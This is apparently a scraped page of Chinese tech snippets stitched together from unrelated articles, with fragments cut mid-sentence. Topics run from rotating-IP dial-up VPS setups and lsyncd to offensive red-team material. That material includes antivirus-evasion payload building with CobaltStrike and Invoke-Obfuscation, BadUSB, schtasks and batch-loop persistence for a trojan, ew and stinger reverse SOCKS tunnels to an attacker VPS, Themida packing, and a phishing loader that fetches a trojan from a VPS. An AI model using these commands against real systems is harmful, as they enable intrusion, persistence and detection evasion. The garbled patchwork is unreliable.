0x01 简单免杀制作 1.CobaltStrike服务端准备 ? 启动服务端命令 ....3.编码混淆 PowerShell的免杀可以用Invoke-Obfuscation,Invoke-Obfuscation主要是对ps1脚本进行免杀,需要现有一个ps的payload。...输入命令,导出免杀ps文件到指定路径 out C:\xxx\xxx.ps1 ? 运行上线,至此,简单免杀制作完成。 ? 4.放到远程服务器备用 ? 0x02 BadUsb制作 1.将硬件插入电脑 ?.../结束键盘通讯 } void loop() { // put your main code here, to run repeatedly: } 代码大体意思: 插入BadUsb后等待3秒
购买动态拨号VPS主机 所以在开始之前,我们需要先购买一台动态拨号VPS主机,这样的主机在百度搜索一下,服务商还是相当多的,在这里推荐一家云立方,感觉还是比较良心的,非广告。...原因在于DNS修改后到完全生效是需要一定时间的,所以如果在前一秒拨号了,这一秒的域名解析的可能还是原来的IP,时间长的话可能需要几分钟,也就是说这段时间内,服务器IP已经变了,但是域名还是上一次拨号的IP...,所以代理是不能用的,对于爬虫这种秒级响应的需求,是完全不能接受的。...动态VPS主机拨号成功之后就请求远程的固定主机,远程主机获取动态VPS主机的IP,就可以得到这个代理,将代理保存下来,这样拨号主机每拨号一次,远程主机就会及时得到拨号主机的IP,如果有多台拨号VPS,也统一发送到远程主机...拨号VPS实现 定时拨号 拨号VPS需要每隔一段时间就拨号一次,我们可以直接执行命令行来拨号,那在Python里我们只需要调用一下这个拨号命令就好了。
很多初学者不知道vps,物理服务器,虚拟主机,云服务器的含义和区别,今天与大家一起说说它们之间的含义和区别: VPS: VPS(Virtual Private Server 虚拟专用服务器)技术,由于有很多的物理服务器其实使用率很低...实现VPS的技术分为容器技术和虚拟化技术。...在容器或虚拟机中,每个VPS都可分配独立公网IP地址、独立操作系统、实现不同VPS间磁盘空间、内存、CPU资源、进程和系统配置的隔离,为用户和应用程序模拟出“独占”使用计算资源的体验。...这一套套虚拟出来的独立的操作系统就是VPS。...如果您还未找到一款合适的动态拨号vps,我可推荐青果云动态拨号vps,专业技术,自建机房,节点丰富,秒拨数百万ip,高可靠人性化设计,精心打造从节点到系统给您不一样的感觉,力助您的业务遍布全国的每一个角落
其他客户端 当然,majora这边也是支持VPS Linux 和Windows 客户端,甚至也有路由器版本....附加彩蛋一:App重播 使用shizuku实现免root的飞行模式重播 -> 移动网络情况下获取新IP。...客户端重播脚本支持 - PC主机环境:0x01 拨号场景 # [必选] majora 服务端的地址,支持域名模式 tunnel_addr: majora.iinti.cn:5879 # [可选] 自定义的...拨号场景,用于换IP) redial: # 重播的cmd # unix/linux 下 /bin/bash # windows 下 CMD command: /bin/bash...# 重播的拨号执行脚本,一般对应的vps提供商会提供 exec_path: ppe_start.sh # 重播的执行间隔 redial_duration: 10m # [可选] extra
至于有哪些可以adsl拨号的野云主机,你在百度搜"vps adsl",能选择的厂商很多的。...就是每次断开拨号后,要等待几秒钟再拨号,太短时间内再拨号有可能又拨到上一个IP,还有可能拨号失败,所以要等待6秒钟(测试值)。...而ping也很耗时间的,一个ping命令会ping 4次,就要耗时4秒。 ? 上面拨号等待6秒加上 ping 的4秒,消耗了10秒钟。...上面猿人学Python说了,抓120次才用6秒,每拨号一次要消耗10秒,而且是每抓120次就要重拨号,想下这个时间太可惜了,每天8万多秒有一半时间都消耗在拨号上面了,但是也没办法。...当然好点的野云主机,除了上面说的IP范围的差异,就是拨号质量差异。好的拨号等待时间更短一点,拨号出错的概率要小一点。 通过上面我们可以轻松计算出一组抓取的耗时是6秒,拨号耗时10秒,总耗时16秒。
至于有哪些可以adsl拨号的野云主机,你在百度搜”vps adsl”,能选择的厂商很多的。...就是每次断开拨号后,要等待几秒钟再拨号,太短时间内再拨号有可能又拨到上一个IP,还有可能拨号失败,所以要等待6秒钟(测试值)。...上面拨号等待6秒加上 ping 的4秒,消耗了10秒钟。...上面猿人学Python说了,抓120次才用6秒,每拨号一次要消耗10秒,而且是每抓120次就要重拨号,想下这个时间太可惜了,每天8万多秒有一半时间都消耗在拨号上面了,但是也没办法。...当然好点的野云主机,除了上面说的IP范围的差异,就是拨号质量差异。好的拨号等待时间更短一点,拨号出错的概率要小一点。 通过上面我们可以轻松计算出一组抓取的耗时是6秒,拨号耗时10秒,总耗时16秒。
(五)添加秒验功能模块 点击秒验右侧的+,然后在弹窗中选择确定添加。 ? 然后点击OK。 ? (六)提交审核 点击秒验,点击立即审核。 ? 然后填写应用类型、所属行业、应用简介、平台、包名和签名。...提示:第一次验证验证比较慢,大概5秒左右。当第一次验证成功之后,再次进入App,不到1秒就可以验证登陆。 ---- 五、注意事项: (一)必须打开流量,秒验是通过4G网络来确定手机号的。...(我手机的两张卡分别:一张移动,一张联通的SIM卡) 请看以下截图: 1.拨号移动,上网联通。 设置拨号移动,上网联通: ? 运行出错示例图: ? 2.拨号联通,上网移动。...设置拨号联通,上网移动: ? 运行出错示例图: ?...---- 六、免密登陆大致流程 我国三大运营商都有对应的免密登录的SDK出台,我搜索了移动、电信、联通的关于一键登录的SDK文档,发现移动的文档写的最完整,电信的一般,联通的官网打不开了。
比如采取以下几点措施: 查杀木马进程 重启主机 断网 关闭主机 而对于我们维持权限,可以有以下几点: 定时任务 使用 schtasks 命令创建定时任务 在目标主机上创建一个名为test的计划任务,启动程序为C:\vps.exe...当执行完该命令,该计划任务就已经启动了 schtasks /create /tn test /sc HOURLY /mo 1 /tr c:\vps.exe /ru system /f 其他启动时间参数:...C: cd C:\windows\temp start run.exe timeout %INTERVAL% goto Again 然后运行这个脚本,这个脚本会每隔2分钟(120秒)执行免杀木马...实战中我们可以将120秒的时间适当延长,免杀马的名字也可以修改为更具有迷惑性的名字。...这样,如果防守方只是杀掉了免杀马的进程,而没有杀掉我们的这个bat脚本的cmd.exe进程的话,我们的这个bat脚本还会定时执行免杀马的。
正文 如果我们直接用vps做服务器的话ip很容易就会泄露,从而导致被溯源,所以我们需要隐藏自己的ip,一般人首先想到的就是ip代理。...我们通过秒拨来实现,于是我在某宝搞到了这个ROS双频路由器。...我们来看一下我们选择秒拨的理由 秒拨的思路就是用国内的家庭宽带拨号上网(PPPoE),每一次断线之后就会重新获取一个新的ip。...之后我们要做的事情就处理这些ip,我们需要一个能够记录IP数量、过滤重复IP,全自动实现IP重复后自动重拨的脚本,下面是效果图 一般电商平台上搜索“秒拨”,能看到不少拨号服务器动态换IP的商品...,实现对用户原始IP的隐匿伪装,达到IP“秒级跳变”的效果。
很多人的电脑目前宽带拨号,或者在公司,都是内网IP,也就是说你只能连接别人,别人不能连接你 其原理跟花生壳差不多一样,但是还是需要点代价,就是自己还得必须准备一个VPS(支持公网的) 本次开源的源码里面...,是客户端与服务器结合在一起了,服务器上面挂一个,自己电脑上面挂一个 映射地址,也就是服务器的公网IP地址,输入点击链接之后, 内网服务器就成功接入到了VPS服务器 之后通过公网地打开,那么就能成功通过公网...VPS服务器访问到你的内网服务器,达到一个中间人作用。
/stinger_client -w http://自己的VPS:7777/proxy.php -l 127.0.0.1 -p 60000 此时目标机的60020端口已经映射到了VPS的60020端口了.../ew_for_linux64 -s rssocks -d 自己的VPS -e 4399 然后在VPS上执行ew ....ew_for_linux64 -s rcsocks -l 1080 -e 4399 设置代理之后即可访问内网 拿下webshell权限之后,使用蚁剑连接,准备传exe 配置蚁剑代理,重启 05 免杀火绒登陆...3389 然后上传exe上去,但是由于内网机有火绒,所以在这里需要免杀处理。...使用Themida加壳免杀。 上传至内网机。 然后运行程序,上线成功 抓密码: 用户名:Administrator 密码:!
作为一个刚入门的钓鱼攻击者,我对钓鱼攻击的经验也很有限,同时在制作免杀马和捆绑方面还有很大的提升空间。...0x01 免杀处理 现在的免杀技术确实有很多选择,其中常见的一种是使用分离加载的方法。在这里,我选择使用C++编写的加载器,并使用MSF作为C2。...将木马图片上传至HVV提供的VPS中并启一个可对外访问的服务,以便被害者能够访问并下载。 诱导被害者点击加载器,加载器会自动下载VPS上的木马图片。...这个该如何是好呢,时间也来不及去研究如何绕过微信的检测机制啊,也试过在VPS上启一个服务让HR去服务器上下载,但是这可行吗?...然而,时间一分一秒过去,已经过去了两个小时,却还没有看到任何会话上线。 我开始思考,是不是在某个环节出了错误,或者我的免杀马被发现了,或者还有其他问题发生了...
作为一个刚入门的钓鱼攻击者,我对钓鱼攻击的经验也很有限,同时在制作免杀马和捆绑方面还有很大的提升空间。...本文重点在于社工构思以及场景的构建,故不会过多描述免杀技术的细节(由于保护敏感信息的需要,所有数据已经脱敏,部分截图也可能不完整,请谅解) 0x01 免杀处理 现在的免杀技术确实有很多选择,其中常见的一种是使用分离加载的方法...将木马图片上传至HVV提供的VPS中并启一个可对外访问的服务,以便被害者能够访问并下载。 诱导被害者点击加载器,加载器会自动下载VPS上的木马图片。...也试过在VPS上启一个服务让HR去服务器上下载,但是这可行吗? 后来我只想到一个办法,就是在exe捆绑马的外面再加一层压缩文件,这样可以让HR觉得更合理。...然而,时间一分一秒过去,已经过去了两个小时,却还没有看到任何会话上线。 我开始思考,是不是在某个环节出了错误,或者我的免杀马被发现了,或者还有其他问题发生了...
嗯,关系很大,我们把整件事情梳理一下,先来看看搭建 4G 代理时的基本流程: 调用网卡拨号,拨号成功后会创建一个虚拟网卡。(正常情况下使用这个虚拟网卡就能上网了) ?...拨号上网 接下来要做的就是拨号了,拨号方面可以选择使用 Wvdial 这种工具,也可以选择使用像 Fanconn 这样的商家提供的拨号脚本(直接调用 PPPD),使用起来的效果会有一些区别。...其实和使用那些拨号 VPS 架设代理服务器一样,我们只需要重新拨个号就能换 IP 了,直接 kill 掉 pppd 进程就可以让它断开拨号,断开后重新执行一遍拨号脚本就是重新拨号了。...命令,不是 Linux 下的 Shell 命令,AT 命令是一种调制解调器命令语言,我们如果需要将它执行起来,需要这么做: echo "AT+CFUN=0" > /dev/ttyUSB2 # 中间间隔1秒左右...在使网卡重新搜网后的几秒至十几/几十秒内的时间里,你无法正常拨号,需要等待它初始化完成后才可以拨号成功,具体等待时间以信号强度为准,我测试的时候通常5秒以内就可以了。
定义日志文件 stausFile 定义状态文件 nodaemon=true 表示不启用守护模式,默认 statusInterval 将lsyncd的状态写入上面的statusFile的间隔,默认10秒...拼接的命令类似于/usr/bin/rsync -ltsd –delete –include-from=- –exclude=* SOURCE TARGET,剩下的就是rsync的内容了,比如指定username,免密码同步...默认是true delay 累计事件,等待rsync同步延时时间,默认15秒(最大累计到1000个不可合并的事件)。也就是15s内监控目录下发生的改动,会累积到一次rsync同步,避免过于频繁的同步。...四、Lsyncd远程同步 用Lsyncd实现两台VPS主机服务器之间实时同步。首先,进入你的源VPS主机,使用S-S-H命令远程登录到目标VPS主机上。...ssh-keygen -t rsa # 全部回车默认 生成密钥成功后,你需要将目标VPS上的密钥文件复制到源VPS主机上,路径保持一致。
dropbearkey -t rsa -f ~/.ssh/id_rsa -s 2048 结合老高N久以前写的文章使用ssh的反向隧道管理内网路由器,我们使用如下命令就可以实现,假设我们把路由器的22端口映射到VPS...上的2222端口,假设我们已经建立了到VPS的免登陆。...的IP ssh.port 指 登录VPS的端口 username 就不说了 -K 30 指的是每隔30s发送一段加密数据以保持链接 开机启动: vi /etc/init.d/ssh #!...=blog.phpgao.com VPS_PORT=22 VPS_USERNAME=laogao LOCAL_PORT=192.168.1.1:22 REMOTE_PORT=0.0.0.0:2222 PROG...=/usr/bin/ssh KEEP_ALIVE=30 start() { $PROG -gfTNR $REMOTE_PORT:$LOCAL_PORT $VPS_IP -p $VPS_PORT
但是这里遇到一个问题,Web Scraper访问一个页面至少要3秒,62W个网站就是186w秒,换算下来至少需要21天,这不搞笑嘛? 为此我想了其他办法,能不能增加效率呢?...为此,我决定买一个拨号软件。让软件按照30s的频率去切换IP,这样我就能安心的看着爬虫去跑了。然而我又天真了,试用了国内各大所谓的换IP软件,一个比一个辣鸡!有时候拨号拨着拨着就自己停了!...接着我看到淘宝有买拨号VPS的。Windows 7 2H2G 19元每天,行吧,尝试下,搭建爬虫环境,然后下了个PPPOE自动拨号的软件,依然按照30s的频率去跑。...但是IP问题没解决,所以我又在淘宝上买了一个拨号V**,通过result = os.system("rasdial V** 41887 1111")这行代码去连接V**,并在跑完1000个网站后断掉,获取新的
领取专属 10元无门槛券
手把手带您无忧上云